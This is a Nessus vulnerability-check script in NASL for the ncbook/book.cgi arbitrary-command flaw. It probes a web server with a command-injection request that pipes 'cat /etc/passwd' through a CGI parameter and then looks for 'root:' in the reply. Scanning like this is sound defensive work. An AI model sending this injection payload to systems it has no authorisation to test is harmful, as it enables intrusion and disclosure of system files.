#
# This script was written by Renaud Deraison <deraison@cvs.nessus.org>
#
# See the Nessus Scripts License for details
#

if(description)
{
 script_id(10721);
 
 
 name["english"] = "ncbook/book.cgi";
 name["francais"] = "ncbook/book.cgi";
 script_name(english:name["english"], francais:name["francais"]);
 
 desc["english"] = "The CGI 'book.cgi' is installed. This CGI has
a well known security flaw that lets an attacker execute arbitrary
commands with the privileges of the http daemon (usually root or nobody).

Solution : remove it from /cgi-bin

Risk factor : Serious";


 desc["francais"] = "Le cgi 'book.cgi' est install. Celui-ci possde
un problme de scurit bien connu qui permet  n'importe qui de faire
executer des commandes arbitraires au daemon http, avec les privilges
de celui-ci (root ou nobody). 

Solution : retirez-le de /cgi-bin.

Facteur de risque : Srieux";


 script_description(english:desc["english"], francais:desc["francais"]);
 
 summary["english"] = "Checks for the presence of /cgi-bin/ncbook/book.cgi";
 summary["francais"] = "Vrifie la prsence de /cgi-bin/ncbook/book.cgi";
 
 script_summary(english:summary["english"], francais:summary["francais"]);
 
 script_category(ACT_GATHER_INFO);
 
 
 script_copyright(english:"This script is Copyright (C) 2001 Renaud Deraison",
		francais:"Ce script est Copyright (C) 2001 Renaud Deraison");
 family["english"] = "CGI abuses";
 family["francais"] = "Abus de CGI";
 script_family(english:family["english"], francais:family["francais"]);
 script_dependencie("find_service.nes", "no404.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}

#
# The script code starts here
#

cgi = "ncbook/book.cgi";
port = is_cgi_installed(cgi);
if(!port)
{
 cgi ="book.cgi";
 port = is_cgi_installed("book.cgi");
}

if(port)
{
 cgibin = cgibin();
 req = http_get(item:string(cgibin, "/", cgi,
"?action=default&current=|cat%20/etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10"),
		port:port);
 soc = open_sock_tcp(port);
 if(soc)
 {
  send(socket:soc, data:req);
  r = recv(socket:soc, length:4096);
  close(soc);
  if("root:" >< r)
  {
   security_hole(port);
  }
 }
}		

